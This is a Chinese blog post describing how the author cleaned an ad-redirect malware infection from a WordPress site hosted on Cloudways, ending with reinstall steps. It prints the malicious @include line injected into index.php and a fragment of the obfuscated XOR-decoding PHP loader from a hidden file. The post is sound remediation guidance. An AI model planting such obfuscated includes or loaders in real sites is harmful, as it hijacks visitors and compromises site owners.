CloudWays上的网站中病毒之后如何清理

2023-09-28 12:59:58 浏览数 (2)

今天碰到一个客户的网站,采用的是Cloudways的服务器,搭建的WordPress网站当手机访问的时候会自动跳转到第三方广告网站,这就是很明显的中病毒的症状。本文记录一下如何清理掉的这个广告跳转病毒。

和以前碰到的广告跳转病毒原理差不多,都是通过插件或者WordPress本身的漏洞,在服务器上传了病毒文件,比如在index.php文件下面,我们发现了这一串加密的代码。

代码语言:javascript复制
<?php
/*85ba2*/

@include ("/homx65/10579**.cloudwaysapps.com/zmwjzux65gcg/public_html/wpx2dincludx65s/blocks/sitx65x2dtitlx65/.c963ccx65x65.oti");

/*85ba2*/

文件指向的是一个名为.c963ccee.oti的文件,包含的部分内容如下:

代码语言:javascript复制
<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G@
A	MDV:AVfUAH]@$3RV
HX[lK6MWGCBI^");
$o8dk17mz .= $ozsfhl("]R$#PXZ<HKi_BI!!%bJvZ
:KNB^iV
]HXIJvZ
:KNCAiV");

代码太长没办法完全解密,不过根据奶爸的经验,不用解密都知道这个是病毒文件,正常的WordPress程序文件都是开源的,不会出现加密的代码。

除了这个之外,文件夹下面还有其他的干扰文件,这里就不一一列举了。

分析出了感染方法,解决也很简单。就是删掉病毒文件,替换成正常文件就行。

最简单的方法就是删除所有WordPress的文件,重装一次。当然,uploads下面的文件是要手动保留的,不然你重装之后网站的图片就全部没有了。

Cloudways是托管型的VPS,所以给用户的权限不是最高的,使用sftp或者ssh还没有权限删掉病毒文件,所以这里需要联系客服处理。

最后,Cloudways上的网站中毒后处理步骤:

  1. 备份一个中毒状态的网站数据备用;
  2. 删除除了wp-content/uploads文件夹之外的所有文件和文件夹(需要联系客服帮你删除,不然权限不够)
  3. 重新下载WordPress安装包,安装WordPress网站;
  4. 重新安装之前的主题和插件。

这么操作完毕之后,病毒文件就没有了

0 人点赞